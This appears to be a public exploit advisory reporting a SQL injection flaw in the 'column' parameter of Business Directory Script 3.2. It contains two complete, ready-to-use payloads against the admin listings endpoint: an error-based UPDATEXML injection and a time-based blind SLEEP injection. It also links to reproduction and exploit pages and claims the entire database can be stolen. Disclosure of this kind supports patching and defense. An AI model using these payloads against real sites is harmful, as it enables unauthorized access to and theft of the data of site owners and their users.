Headline
Business Directory Script 3.2 SQL Injection
Business Directory Script version 3.2 suffers from a remote SQL injection vulnerability.
## Title: Business-Directory-Script-3.2 SQLi## Author: nu11secur1ty## Date: 08/25/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo## Reference: https://portswigger.net/web-security/sql-injection## Description:The `column` parameter appears to be vulnerable to SQL injectionattacks. The payload ' was submitted in the column parameter, and adatabase error message was returned. You should review the contents ofthe error message, and the application's handling of other input, toconfirm whether a vulnerability is present. Additionally, the payload(select*from(select(sleep(20)))a) was submitted in the columnparameter. The application took 20271 milliseconds to respond to therequest, compared with 230 milliseconds for the original request,indicating that the injected SQL command caused a time delay. Theattacker can steal all information from the database of the server ofthis application!STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```mysql---Parameter: column (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT(ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id= Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html)## Time spend:01:35:00